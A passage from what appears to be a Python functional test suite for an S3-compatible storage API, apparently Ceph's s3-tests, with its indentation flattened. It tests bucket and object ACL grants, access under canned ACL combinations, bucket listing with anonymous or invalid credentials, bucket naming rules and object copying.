@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_bucket_acl_grant_userid_readacp():
bucket_name = _bucket_acl_grant_userid('READ_ACP')
# alt user can't read
_check_bucket_acl_grant_cant_read(bucket_name)
# can read acl
_check_bucket_acl_grant_can_readacp(bucket_name)
# can't write
_check_bucket_acl_grant_cant_write(bucket_name)
# can't write acp
#_check_bucket_acl_grant_cant_writeacp_can_readacp(bucket)
_check_bucket_acl_grant_cant_writeacp(bucket_name)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/userid WRITE')
@attr(assertion='can write data, no other r/w')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_bucket_acl_grant_userid_write():
bucket_name = _bucket_acl_grant_userid('WRITE')
# alt user can't read
_check_bucket_acl_grant_cant_read(bucket_name)
# can't read acl
_check_bucket_acl_grant_cant_readacp(bucket_name)
# can write
_check_bucket_acl_grant_can_write(bucket_name)
# can't write acl
_check_bucket_acl_grant_cant_writeacp(bucket_name)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/userid WRITE_ACP')
@attr(assertion='can write acls, no other r/w')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_bucket_acl_grant_userid_writeacp():
bucket_name = _bucket_acl_grant_userid('WRITE_ACP')
# alt user can't read
_check_bucket_acl_grant_cant_read(bucket_name)
# can't read acl
_check_bucket_acl_grant_cant_readacp(bucket_name)
# can't write
_check_bucket_acl_grant_cant_write(bucket_name)
# can write acl
_check_bucket_acl_grant_can_writeacp(bucket_name)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='set acl w/invalid userid')
@attr(assertion='fails 400')
def test_bucket_acl_grant_nonexist_user():
bucket_name = get_new_bucket()
client = get_client()
bad_user_id = '_foo'
#response = client.get_bucket_acl(Bucket=bucket_name)
grant = {'Grantee': {'ID': bad_user_id, 'Type': 'CanonicalUser' }, 'Permission': 'FULL_CONTROL'}
grant = add_bucket_user_grant(bucket_name, grant)
e = assert_raises(ClientError, client.put_bucket_acl, Bucket=bucket_name, AccessControlPolicy=grant)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'InvalidArgument')
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='revoke all ACLs')
@attr(assertion='can: read obj, get/set bucket acl, cannot write objs')
def test_bucket_acl_no_grants():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_bucket_acl(Bucket=bucket_name)
old_grants = response['Grants']
policy = {}
policy['Owner'] = response['Owner']
# clear grants
policy['Grants'] = []
# remove read/write permission
response = client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=policy)
# can read
client.get_object(Bucket=bucket_name, Key='foo')
# can't write
check_access_denied(client.put_object, Bucket=bucket_name, Key='baz', Body='a')
#TODO fix this test once a fix is in for same issues in
# test_access_bucket_private_object_private
client2 = get_client()
# owner can read acl
client2.get_bucket_acl(Bucket=bucket_name)
# owner can write acl
client2.put_bucket_acl(Bucket=bucket_name, ACL='private')
# set policy back to original so that bucket can be cleaned up
policy['Grants'] = old_grants
client2.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=policy)
def _get_acl_header(user_id=None, perms=None):
all_headers = ["read", "write", "read-acp", "write-acp", "full-control"]
headers = []
if user_id == None:
user_id = get_alt_user_id()
if perms != None:
for perm in perms:
header = ("x-amz-grant-{perm}".format(perm=perm), "id={uid}".format(uid=user_id))
headers.append(header)
else:
for perm in all_headers:
header = ("x-amz-grant-{perm}".format(perm=perm), "id={uid}".format(uid=user_id))
headers.append(header)
return headers
@attr(resource='object')
@attr(method='PUT')
@attr(operation='add all grants to user through headers')
@attr(assertion='adds all grants individually to second user')
@attr('fails_on_dho')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_object_header_acl_grants():
bucket_name = get_new_bucket()
client = get_client()
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
headers = _get_acl_header()
def add_headers_before_sign(**kwargs):
updated_headers = (kwargs['request'].__dict__['headers'].__dict__['_headers'] + headers)
kwargs['request'].__dict__['headers'].__dict__['_headers'] = updated_headers
client.meta.events.register('before-sign.s3.PutObject', add_headers_before_sign)
client.put_object(Bucket=bucket_name, Key='foo_key', Body='bar')
response = client.get_object_acl(Bucket=bucket_name, Key='foo_key')
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='READ',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='WRITE',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='READ_ACP',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='WRITE_ACP',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='FULL_CONTROL',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
@attr(resource='bucket')
@attr(method='PUT')
@attr(operation='add all grants to user through headers')
@attr(assertion='adds all grants individually to second user')
@attr('fails_on_dho')
@attr('fails_on_aws') # <Error><Code>InvalidArgument</Code><Message>Invalid id</Message><ArgumentName>CanonicalUser/ID</ArgumentName><ArgumentValue>${ALTUSER}</ArgumentValue>
def test_bucket_header_acl_grants():
headers = _get_acl_header()
bucket_name = get_new_bucket_name()
client = get_client()
headers = _get_acl_header()
def add_headers_before_sign(**kwargs):
updated_headers = (kwargs['request'].__dict__['headers'].__dict__['_headers'] + headers)
kwargs['request'].__dict__['headers'].__dict__['_headers'] = updated_headers
client.meta.events.register('before-sign.s3.CreateBucket', add_headers_before_sign)
client.create_bucket(Bucket=bucket_name)
response = client.get_bucket_acl(Bucket=bucket_name)
grants = response['Grants']
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
check_grants(
grants,
[
dict(
Permission='READ',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='WRITE',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='READ_ACP',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='WRITE_ACP',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='FULL_CONTROL',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
],
)
alt_client = get_alt_client()
alt_client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
# set bucket acl to public-read-write so that teardown can work
alt_client.put_bucket_acl(Bucket=bucket_name, ACL='public-read-write')
# This test will fail on DH Objects. DHO allows multiple users with one account, which
# would violate the uniqueness requirement of a user's email. As such, DHO users are
# created without an email.
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='add second FULL_CONTROL user')
@attr(assertion='works for S3, fails for DHO')
@attr('fails_on_aws') # <Error><Code>AmbiguousGrantByEmailAddress</Code><Message>The e-mail address you provided is associated with more than one account. Please retry your request using a different identification method or after resolving the ambiguity.</Message>
def test_bucket_acl_grant_email():
bucket_name = get_new_bucket()
client = get_client()
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
alt_email_address = get_alt_email()
main_user_id = get_main_user_id()
main_display_name = get_main_display_name()
grant = {'Grantee': {'EmailAddress': alt_email_address, 'Type': 'AmazonCustomerByEmail' }, 'Permission': 'FULL_CONTROL'}
grant = add_bucket_user_grant(bucket_name, grant)
client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy = grant)
response = client.get_bucket_acl(Bucket=bucket_name)
grants = response['Grants']
check_grants(
grants,
[
dict(
Permission='FULL_CONTROL',
ID=alt_user_id,
DisplayName=alt_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
dict(
Permission='FULL_CONTROL',
ID=main_user_id,
DisplayName=main_display_name,
URI=None,
EmailAddress=None,
Type='CanonicalUser',
),
]
)
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='add acl for nonexistent user')
@attr(assertion='fail 400')
def test_bucket_acl_grant_email_not_exist():
# behavior not documented by amazon
bucket_name = get_new_bucket()
client = get_client()
alt_user_id = get_alt_user_id()
alt_display_name = get_alt_display_name()
alt_email_address = get_alt_email()
NONEXISTENT_EMAIL = 'doesnotexist@dreamhost.com.invalid'
grant = {'Grantee': {'EmailAddress': NONEXISTENT_EMAIL, 'Type': 'AmazonCustomerByEmail'}, 'Permission': 'FULL_CONTROL'}
grant = add_bucket_user_grant(bucket_name, grant)
e = assert_raises(ClientError, client.put_bucket_acl, Bucket=bucket_name, AccessControlPolicy = grant)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 400)
eq(error_code, 'UnresolvableGrantByEmailAddress')
@attr(resource='bucket')
@attr(method='ACLs')
@attr(operation='revoke all ACLs')
@attr(assertion='acls read back as empty')
def test_bucket_acl_revoke_all():
# revoke all access, including the owner's access
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo', Body='bar')
response = client.get_bucket_acl(Bucket=bucket_name)
old_grants = response['Grants']
policy = {}
policy['Owner'] = response['Owner']
# clear grants
policy['Grants'] = []
# remove read/write permission for everyone
client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=policy)
response = client.get_bucket_acl(Bucket=bucket_name)
eq(len(response['Grants']), 0)
# set policy back to original so that bucket can be cleaned up
policy['Grants'] = old_grants
client.put_bucket_acl(Bucket=bucket_name, AccessControlPolicy=policy)
# TODO rgw log_bucket.set_as_logging_target() gives 403 Forbidden
# http://tracker.newdream.net/issues/984
@attr(resource='bucket.log')
@attr(method='put')
@attr(operation='set/enable/disable logging target')
@attr(assertion='operations succeed')
@attr('fails_on_rgw')
def test_logging_toggle():
bucket_name = get_new_bucket()
client = get_client()
main_display_name = get_main_display_name()
main_user_id = get_main_user_id()
status = {'LoggingEnabled': {'TargetBucket': bucket_name, 'TargetGrants': [{'Grantee': {'DisplayName': main_display_name, 'ID': main_user_id,'Type': 'CanonicalUser'},'Permission': 'FULL_CONTROL'}], 'TargetPrefix': 'foologgingprefix'}}
client.put_bucket_logging(Bucket=bucket_name, BucketLoggingStatus=status)
client.get_bucket_logging(Bucket=bucket_name)
status = {'LoggingEnabled': {}}
client.put_bucket_logging(Bucket=bucket_name, BucketLoggingStatus=status)
# NOTE: this does not actually test whether or not logging works
def _setup_access(bucket_acl, object_acl):
"""
Simple test fixture: create a bucket with given ACL, with objects:
- a: owning user, given ACL
- a2: same object accessed by some other user
- b: owning user, default ACL in bucket w/given ACL
- b2: same object accessed by a some other user
"""
bucket_name = get_new_bucket()
client = get_client()
key1 = 'foo'
key2 = 'bar'
newkey = 'new'
client.put_bucket_acl(Bucket=bucket_name, ACL=bucket_acl)
client.put_object(Bucket=bucket_name, Key=key1, Body='foocontent')
client.put_object_acl(Bucket=bucket_name, Key=key1, ACL=object_acl)
client.put_object(Bucket=bucket_name, Key=key2, Body='barcontent')
return bucket_name, key1, key2, newkey
def get_bucket_key_names(bucket_name):
objs_list = get_objects_list(bucket_name)
return frozenset(obj for obj in objs_list)
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/private')
@attr(assertion='public has no access to bucket or objects')
def test_access_bucket_private_object_private():
# all the test_access_* tests follow this template
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='private')
alt_client = get_alt_client()
# acled object read fail
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key1)
# default object read fail
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key2)
# bucket read fail
check_access_denied(alt_client.list_objects, Bucket=bucket_name)
# acled object write fail
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='barcontent')
# NOTE: The above put's causes the connection to go bad, therefore the client can't be used
# anymore. This can be solved either by:
# 1) putting an empty string ('') in the 'Body' field of those put_object calls
# 2) getting a new client hence the creation of alt_client{2,3} for the tests below
# TODO: Test it from another host and on AWS, Report this to Amazon, if findings are identical
alt_client2 = get_alt_client()
# default object write fail
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
# bucket write fail
alt_client3 = get_alt_client()
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/private with list-objects-v2')
@attr(assertion='public has no access to bucket or objects')
@attr('list-objects-v2')
def test_access_bucket_private_objectv2_private():
# all the test_access_* tests follow this template
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='private')
alt_client = get_alt_client()
# acled object read fail
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key1)
# default object read fail
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key2)
# bucket read fail
check_access_denied(alt_client.list_objects_v2, Bucket=bucket_name)
# acled object write fail
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='barcontent')
# NOTE: The above put's causes the connection to go bad, therefore the client can't be used
# anymore. This can be solved either by:
# 1) putting an empty string ('') in the 'Body' field of those put_object calls
# 2) getting a new client hence the creation of alt_client{2,3} for the tests below
# TODO: Test it from another host and on AWS, Report this to Amazon, if findings are identical
alt_client2 = get_alt_client()
# default object write fail
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
# bucket write fail
alt_client3 = get_alt_client()
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/public-read')
@attr(assertion='public can only read readable object')
def test_access_bucket_private_object_publicread():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='public-read')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read, b gets default (private)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
check_access_denied(alt_client3.list_objects, Bucket=bucket_name)
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/public-read with list-objects-v2')
@attr(assertion='public can only read readable object')
@attr('list-objects-v2')
def test_access_bucket_private_objectv2_publicread():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='public-read')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read, b gets default (private)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
check_access_denied(alt_client3.list_objects_v2, Bucket=bucket_name)
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/public-read/write')
@attr(assertion='public can only read the readable object')
def test_access_bucket_private_object_publicreadwrite():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='public-read-write')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read-only ... because it is in a private bucket
# b gets default (private)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
check_access_denied(alt_client3.list_objects, Bucket=bucket_name)
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: private/public-read/write with list-objects-v2')
@attr(assertion='public can only read the readable object')
@attr('list-objects-v2')
def test_access_bucket_private_objectv2_publicreadwrite():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='private', object_acl='public-read-write')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read-only ... because it is in a private bucket
# b gets default (private)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
check_access_denied(alt_client3.list_objects_v2, Bucket=bucket_name)
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read/private')
@attr(assertion='public can only list the bucket')
def test_access_bucket_publicread_object_private():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read', object_acl='private')
alt_client = get_alt_client()
# a should be private, b gets default (private)
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key1)
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='barcontent')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
objs = get_objects_list(bucket=bucket_name, client=alt_client3)
eq(objs, ['bar', 'foo'])
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read/public-read')
@attr(assertion='public can read readable objects and list bucket')
def test_access_bucket_publicread_object_publicread():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read', object_acl='public-read')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
# a should be public-read, b gets default (private)
body = _get_body(response)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
objs = get_objects_list(bucket=bucket_name, client=alt_client3)
eq(objs, ['bar', 'foo'])
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read/public-read-write')
@attr(assertion='public can read readable objects and list bucket')
def test_access_bucket_publicread_object_publicreadwrite():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read', object_acl='public-read-write')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read-only ... because it is in a r/o bucket
# b gets default (private)
eq(body, 'foocontent')
check_access_denied(alt_client.put_object, Bucket=bucket_name, Key=key1, Body='foooverwrite')
alt_client2 = get_alt_client()
check_access_denied(alt_client2.get_object, Bucket=bucket_name, Key=key2)
check_access_denied(alt_client2.put_object, Bucket=bucket_name, Key=key2, Body='baroverwrite')
alt_client3 = get_alt_client()
objs = get_objects_list(bucket=bucket_name, client=alt_client3)
eq(objs, ['bar', 'foo'])
check_access_denied(alt_client3.put_object, Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read-write/private')
@attr(assertion='private objects cannot be read, but can be overwritten')
def test_access_bucket_publicreadwrite_object_private():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read-write', object_acl='private')
alt_client = get_alt_client()
# a should be private, b gets default (private)
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key1)
alt_client.put_object(Bucket=bucket_name, Key=key1, Body='barcontent')
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key2)
alt_client.put_object(Bucket=bucket_name, Key=key2, Body='baroverwrite')
objs = get_objects_list(bucket=bucket_name, client=alt_client)
eq(objs, ['bar', 'foo'])
alt_client.put_object(Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read-write/public-read')
@attr(assertion='private objects cannot be read, but can be overwritten')
def test_access_bucket_publicreadwrite_object_publicread():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read-write', object_acl='public-read')
alt_client = get_alt_client()
# a should be public-read, b gets default (private)
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
eq(body, 'foocontent')
alt_client.put_object(Bucket=bucket_name, Key=key1, Body='barcontent')
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key2)
alt_client.put_object(Bucket=bucket_name, Key=key2, Body='baroverwrite')
objs = get_objects_list(bucket=bucket_name, client=alt_client)
eq(objs, ['bar', 'foo'])
alt_client.put_object(Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='object')
@attr(method='ACLs')
@attr(operation='set bucket/object acls: public-read-write/public-read-write')
@attr(assertion='private objects cannot be read, but can be overwritten')
def test_access_bucket_publicreadwrite_object_publicreadwrite():
bucket_name, key1, key2, newkey = _setup_access(bucket_acl='public-read-write', object_acl='public-read-write')
alt_client = get_alt_client()
response = alt_client.get_object(Bucket=bucket_name, Key=key1)
body = _get_body(response)
# a should be public-read-write, b gets default (private)
eq(body, 'foocontent')
alt_client.put_object(Bucket=bucket_name, Key=key1, Body='foooverwrite')
check_access_denied(alt_client.get_object, Bucket=bucket_name, Key=key2)
alt_client.put_object(Bucket=bucket_name, Key=key2, Body='baroverwrite')
objs = get_objects_list(bucket=bucket_name, client=alt_client)
eq(objs, ['bar', 'foo'])
alt_client.put_object(Bucket=bucket_name, Key=newkey, Body='newcontent')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all buckets')
@attr(assertion='returns all expected buckets')
def test_buckets_create_then_list():
client = get_client()
bucket_names = []
for i in range(5):
bucket_name = get_new_bucket_name()
bucket_names.append(bucket_name)
for name in bucket_names:
client.create_bucket(Bucket=name)
response = client.list_buckets()
bucket_dicts = response['Buckets']
buckets_list = []
buckets_list = get_buckets_list()
for name in bucket_names:
if name not in buckets_list:
raise RuntimeError("S3 implementation's GET on Service did not return bucket we created: %r", bucket.name)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all buckets')
@attr(assertion='all buckets have a sane creation time')
def test_buckets_list_ctime():
# check that creation times are within a day
before = datetime.datetime.now(datetime.timezone.utc) - datetime.timedelta(days=1)
client = get_client()
for i in range(5):
client.create_bucket(Bucket=get_new_bucket_name())
response = client.list_buckets()
for bucket in response['Buckets']:
ctime = bucket['CreationDate']
assert before <= ctime, '%r > %r' % (before, ctime)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all buckets (anonymous)')
@attr(assertion='succeeds')
@attr('fails_on_aws')
def test_list_buckets_anonymous():
# Get a connection with bad authorization, then change it to be our new Anonymous auth mechanism,
# emulating standard HTTP access.
#
# While it may have been possible to use httplib directly, doing it this way takes care of also
# allowing us to vary the calling format in testing.
unauthenticated_client = get_unauthenticated_client()
response = unauthenticated_client.list_buckets()
eq(len(response['Buckets']), 0)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all buckets (bad auth)')
@attr(assertion='fails 403')
def test_list_buckets_invalid_auth():
bad_auth_client = get_bad_auth_client()
e = assert_raises(ClientError, bad_auth_client.list_buckets)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'InvalidAccessKeyId')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all buckets (bad auth)')
@attr(assertion='fails 403')
def test_list_buckets_bad_auth():
main_access_key = get_main_aws_access_key()
bad_auth_client = get_bad_auth_client(aws_access_key_id=main_access_key)
e = assert_raises(ClientError, bad_auth_client.list_buckets)
status, error_code = _get_status_and_error_code(e.response)
eq(status, 403)
eq(error_code, 'SignatureDoesNotMatch')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create bucket')
@attr(assertion='name starts with alphabetic works')
# this test goes outside the user-configure prefix because it needs to
# control the initial character of the bucket name
@nose.with_setup(
setup=lambda: nuke_prefixed_buckets(prefix='a'+get_prefix()),
teardown=lambda: nuke_prefixed_buckets(prefix='a'+get_prefix()),
)
def test_bucket_create_naming_good_starts_alpha():
check_good_bucket_name('foo', _prefix='a'+get_prefix())
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create bucket')
@attr(assertion='name starts with numeric works')
# this test goes outside the user-configure prefix because it needs to
# control the initial character of the bucket name
@nose.with_setup(
setup=lambda: nuke_prefixed_buckets(prefix='0'+get_prefix()),
teardown=lambda: nuke_prefixed_buckets(prefix='0'+get_prefix()),
)
def test_bucket_create_naming_good_starts_digit():
check_good_bucket_name('foo', _prefix='0'+get_prefix())
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create bucket')
@attr(assertion='name containing dot works')
def test_bucket_create_naming_good_contains_period():
check_good_bucket_name('aaa.111')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create bucket')
@attr(assertion='name containing hyphen works')
def test_bucket_create_naming_good_contains_hyphen():
check_good_bucket_name('aaa-111')
@attr(resource='bucket')
@attr(method='put')
@attr(operation='create bucket with objects and recreate it')
@attr(assertion='bucket recreation not overriding index')
def test_bucket_recreate_not_overriding():
key_names = ['mykey1', 'mykey2']
bucket_name = _create_objects(keys=key_names)
objs_list = get_objects_list(bucket_name)
eq(key_names, objs_list)
client = get_client()
client.create_bucket(Bucket=bucket_name)
objs_list = get_objects_list(bucket_name)
eq(key_names, objs_list)
@attr(resource='object')
@attr(method='put')
@attr(operation='create and list objects with special names')
@attr(assertion='special names work')
def test_bucket_create_special_key_names():
key_names = [
' ',
'"',
'$',
'%',
'&',
'\'',
'<',
'>',
'_',
'_ ',
'_ _',
'__',
]
bucket_name = _create_objects(keys=key_names)
objs_list = get_objects_list(bucket_name)
eq(key_names, objs_list)
client = get_client()
for name in key_names:
eq((name in objs_list), True)
response = client.get_object(Bucket=bucket_name, Key=name)
body = _get_body(response)
eq(name, body)
client.put_object_acl(Bucket=bucket_name, Key=name, ACL='private')
@attr(resource='bucket')
@attr(method='get')
@attr(operation='create and list objects with underscore as prefix, list using prefix')
@attr(assertion='listing works correctly')
def test_bucket_list_special_prefix():
key_names = ['_bla/1', '_bla/2', '_bla/3', '_bla/4', 'abcd']
bucket_name = _create_objects(keys=key_names)
objs_list = get_objects_list(bucket_name)
eq(len(objs_list), 5)
objs_list = get_objects_list(bucket_name, prefix='_bla/')
eq(len(objs_list), 4)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy zero sized object in same bucket')
@attr(assertion='works')
def test_object_copy_zero_size():
key = 'foo123bar'
bucket_name = _create_objects(keys=[key])
fp_a = FakeWriteFile(0, '')
client = get_client()
client.put_object(Bucket=bucket_name, Key=key, Body=fp_a)
copy_source = {'Bucket': bucket_name, 'Key': key}
client.copy(copy_source, bucket_name, 'bar321foo')
response = client.get_object(Bucket=bucket_name, Key='bar321foo')
eq(response['ContentLength'], 0)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object in same bucket')
@attr(assertion='works')
def test_object_copy_same_bucket():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
client.copy(copy_source, bucket_name, 'bar321foo')
response = client.get_object(Bucket=bucket_name, Key='bar321foo')
body = _get_body(response)
eq('foo', body)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object with content-type')
@attr(assertion='works')
def test_object_copy_verify_contenttype():
bucket_name = get_new_bucket()
client = get_client()
content_type = 'text/bla'
client.put_object(Bucket=bucket_name, ContentType=content_type, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
client.copy(copy_source, bucket_name, 'bar321foo')
response = client.get_object(Bucket=bucket_name, Key='bar321foo')
body = _get_body(response)
eq('foo', body)
response_content_type = response['ContentType']
eq(response_content_type, content_type)
@attr(resource='object')
@attr(method='put')
@attr(operation='copy object to itself')
@attr(assertion='fails')
def test_object_copy_to_itself():
bucket_name = get_new_bucket()
client = get_client()
client.put_object(Bucket=bucket_name, Key='foo123bar', Body='foo')
copy_source = {'Bucket': bucket_name, 'Key': 'foo123bar'}
e = assert_raises(ClientError, client.copy, copy_source, bucket_name, 'foo123bar')
